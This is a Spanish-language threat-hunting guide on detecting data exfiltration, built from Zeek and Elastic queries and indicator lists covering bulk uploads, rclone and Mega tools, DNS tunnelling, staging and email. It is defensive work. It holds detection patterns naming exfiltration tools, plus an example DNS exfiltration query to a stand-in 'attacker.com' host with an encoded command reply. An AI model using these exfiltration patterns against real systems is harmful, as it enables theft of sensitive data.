Hunting de Exfiltracion de Datos: Detectar Transferencias, DNS Exfil y Cloud Upload

La Exfiltracion como Objetivo Final

La exfiltracion de datos (MITRE ATT&CK Tactic TA0010) es frecuentemente el objetivo final del adversario. En ataques de espionaje, el robo de propiedad intelectual o informacion sensible es la mision. En ataques de ransomware de doble extorsion, la exfiltracion precede al cifrado y se usa como palanca de negociacion.

Detectar la exfiltracion es critico porque es la ultima oportunidad de prevenir el dano. Una vez que los datos salen de la red, el dano esta hecho.

Transferencias Masivas (T1048)

La forma mas directa de exfiltracion es transferir grandes volumenes de datos a un destino externo. Aunque simple, genera anomalias de volumen detectables.

Hunting con datos de red

Zeek conn.log: transferencias de alto volumen

# Conexiones con upload alto (orig_bytes grande)
# desde hosts internos a destinos externos
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p orig_bytes resp_bytes | \
  awk '$5 > 104857600' | \  # Mas de 100 MB subidos
  sort -t$'\t' -k5 -rn | head 20

# Elastic: transferencias salientes grandes
source.bytes: [104857600 TO *] AND
source.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16) AND
NOT destination.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
| stats sum(source.bytes) as total_upload by source.ip, destination.ip
| sort -total_upload

Baseline de volumen

La deteccion por volumen requiere un baseline. Para cada host o segmento, establecer:

• Volumen promedio de upload diario
• Desviacion estandar
• Umbral de alerta (por ejemplo, media + 3 desviaciones estandar)

Un host de usuario que normalmente sube 50 MB al dia y repentinamente sube 5 GB es una anomalia clara. Un servidor de backup que sube 5 GB es normal.

Exfiltracion via Cloud Storage (T1567.002)

Los adversarios usan servicios de almacenamiento cloud como destino de exfiltracion porque el trafico a estos servicios es esperado y frecuentemente permitido por los firewalls.

Servicios abusados frecuentemente

Servicios de cloud storage usados para exfiltracion:
  - mega.nz / mega.io (favorito de grupos ransomware)
  - Google Drive (drive.google.com)
  - Dropbox (dl.dropboxusercontent.com)
  - OneDrive (1drv.ms, onedrive.live.com)
  - Box (box.com)
  - pCloud (pcloud.com)
  - Backblaze B2 (backblazeb2.com)
  - Amazon S3 (s3.amazonaws.com)

Herramientas de exfiltracion

rclone. Es la herramienta preferida por los grupos de ransomware para exfiltracion masiva. Es un binario legitimo de sincronizacion cloud que soporta docenas de providers.

Artefactos de rclone:
  - Sysmon Event ID 1: ejecucion de rclone.exe
    (puede ser renombrado: buscar por hash)
  - CommandLine: copy, sync, o move con destino remoto
  - Archivo de configuracion: rclone.conf (contiene tokens de acceso)
  - Hash SHA256 conocido del binario rclone
  - Sysmon Event ID 11: creacion de rclone.conf

# Deteccion de rclone (incluyendo binarios renombrados)
event.code: "1" AND (
  process.name: "rclone*" OR
  process.command_line: (*rclone* OR *copy* AND *mega* OR *sync* AND *s3*)
) AND
process.hash.sha256: (hash_conocido_rclone_v1_x OR hash_conocido_rclone_v2_x)

mega-cmd / megatools. Herramientas de linea de comandos para Mega.nz.

# Deteccion de herramientas Mega
event.code: "1" AND
process.name: (mega-cmd* OR megacopy* OR megaput* OR megatools*)

7-Zip y WinRAR para staging. Antes de exfiltrar, los adversarios comprimen los datos.

# Compresion de volumenes grandes seguida de upload
event.code: "1" AND
process.name: ("7z.exe" OR "rar.exe" OR "WinRAR.exe") AND
process.command_line: (*a* AND (*password* OR *-p* OR *-hp*))

Trafico de red a servicios cloud

# Conexiones a servicios de cloud storage
# con volumen significativo de upload
destination.domain: (
  *.mega.nz OR *.mega.co.nz OR *.megaupload.* OR
  *.dropbox.com OR *.dl.dropboxusercontent.com OR
  *.drive.google.com OR *.googleapis.com OR
  *.1drv.ms OR *.onedrive.live.com OR
  *.pcloud.com OR *.backblaze*.com
) AND
source.bytes: [10485760 TO *]
| stats sum(source.bytes) by source.ip, destination.domain

Exfiltracion via DNS (T1048.003)

La exfiltracion por DNS codifica datos en las consultas DNS. Es lenta (ancho de banda limitado) pero dificil de detectar porque el trafico DNS raramente se bloquea.

Mecanica de la exfiltracion DNS

Datos salientes (query):

Dato original: "password123"
Codificado Base32: OBQXG43XN5ZGI===
Query DNS: OBQXG43XN5ZGI.exfil.attacker.com (tipo A)

Datos entrantes (respuesta):

Query: cmd.exfil.attacker.com (tipo TXT)
Respuesta TXT: "aW5zdGFsbCBiYWNrZG9vcg==" (comando codificado)

Indicadores de exfiltracion DNS

Metricas a calcular por dominio base:
  - Numero total de queries por hora
  - Longitud promedio de los subdominios
  - Entropia de caracteres en subdominios
  - Ratio de queries TXT vs A/AAAA
  - Volumen total de datos en subdominios (sum de longitudes)
  - Numero de subdominios unicos (alto = datos diferentes)

Consulta de hunting

# Zeek: dominios con subdominios de alta entropia y volumen
cat dns.log | zeek-cut query | \
  awk -F. '{
    sub = "";
    for(i=1; i<=NF-2; i++) sub = sub "." $i;
    base = $(NF-1) "." $NF;
    print base, length(sub), sub
  }' | \
  awk '$2 > 30' | \
  cut -d' ' -f1 | sort | uniq -c | sort -rn | head 20

Staging de Datos (T1074)

Antes de exfiltrar, los adversarios frecuentemente agrupan y comprimen los datos en un directorio de staging. Detectar el staging puede anticipar la exfiltracion.

Indicadores de staging

Comportamiento sospechoso de staging:
  - Creacion de archivos comprimidos grandes en %TEMP%,
    %PUBLIC% o directorios raiz
  - Uso de 7z, rar, tar con flag de password
  - Comandos xcopy, robocopy o copy que mueven archivos
    de multiples origenes a un unico directorio
  - Acceso masivo a file shares (muchos archivos leidos
    en poco tiempo)
  - Proceso no interactivo leyendo documentos de usuario
    (Word, Excel, PDF)

Consulta de hunting

# Acceso masivo a archivos de usuario (posible collection)
event.code: "1" AND
process.command_line: (
  *xcopy* OR *robocopy* OR *copy* OR *tar* OR *7z*
) AND
process.command_line: (
  *Documents* OR *Desktop* OR *Downloads* OR
  *.docx* OR *.xlsx* OR *.pdf* OR *.pst*
)

# Creacion de archivos comprimidos grandes
event.code: "11" AND
file.extension: (zip OR rar OR 7z OR tar OR gz) AND
file.path: (*Temp* OR *Public* OR *ProgramData* OR *tmp*)

Exfiltracion por Canales Cifrados (T1048.002)

Los adversarios pueden crear sus propios canales cifrados para exfiltrar datos, independientes del C2.

Indicadores

Canales cifrados de exfiltracion:
  - SSH/SCP saliente (puerto 22) desde hosts que no usan SSH
  - FTP/FTPS saliente desde endpoints de usuario
  - Conexiones HTTPS de larga duracion con alto upload
  - Uso de herramientas como WinSCP, FileZilla desde
    procesos sospechosos
  - Trafico a IPs en hosting conocido por bulletproof

Consulta de hunting

# SSH saliente desde hosts que no son servidores
event.code: "3" AND
destination.port: 22 AND
source.ip: (rango_de_endpoints_usuario) AND
NOT source.ip: (servidores_autorizados_ssh)

Exfiltracion via Email (T1048.003)

Los adversarios pueden exfiltrar datos adjuntandolos a emails salientes, ya sea a cuentas personales o a cuentas comprometidas.

Indicadores

Anomalias de email para hunting:
  - Adjuntos inusualmente grandes en emails salientes
  - Emails a dominios de webmail (gmail, outlook, protonmail)
    desde cuentas corporativas con adjuntos
  - Volumen anomalo de emails salientes desde una cuenta
  - Emails a direcciones no conocidas en el directorio

Estrategia Integral de Hunting de Exfiltracion

Fase 1: Establecer baselines de volumen

Para cada segmento de red y para cada host critico, establecer:

• Upload diario promedio por protocolo (HTTPS, DNS, SMTP)
• Destinos habituales de upload
• Horarios de transferencia normales

Fase 2: Buscar anomalias de volumen

• Hosts con upload significativamente superior a su baseline
• Upload a destinos nuevos (IPs/dominios no vistos previamente)
• Transferencias en horarios inusuales

Fase 3: Buscar herramientas de exfiltracion

• Ejecucion de rclone, mega-cmd, megatools, WinSCP
• Uso de compresores con password (7z -p, rar -hp)
• Scripts de PowerShell con funcionalidad de upload

Fase 4: Buscar staging

• Creacion de archivos comprimidos grandes
• Acceso masivo a file shares
• Comandos de copia o recopilacion de archivos

Fase 5: Correlacionar con C2 y movimiento lateral

La exfiltracion raramente ocurre de forma aislada. Correlacionar con:

• Comunicacion C2 activa desde el mismo host (el C2 coordina la exfiltracion)
• Movimiento lateral previo (el adversario accedio a los datos desde otro host)
• Acceso a credenciales (necesarias para acceder a datos protegidos)

Conclusion

La exfiltracion es la fase del ataque con mayor impacto de negocio, pero tambien una de las mas detectables. El volumen de datos necesario para causar dano significativo genera anomalias visibles en los logs de red. Las herramientas usadas (rclone, mega-cmd, 7z) dejan artefactos en los logs de endpoint. Y el staging previo a la exfiltracion proporciona una ventana de deteccion adicional.

La clave es tener baselines de volumen de trafico por host y segmento, monitorizar el uso de herramientas de transferencia y compresion, y correlacionar con otras fases del ataque (C2, movimiento lateral, acceso a credenciales) para construir una imagen completa.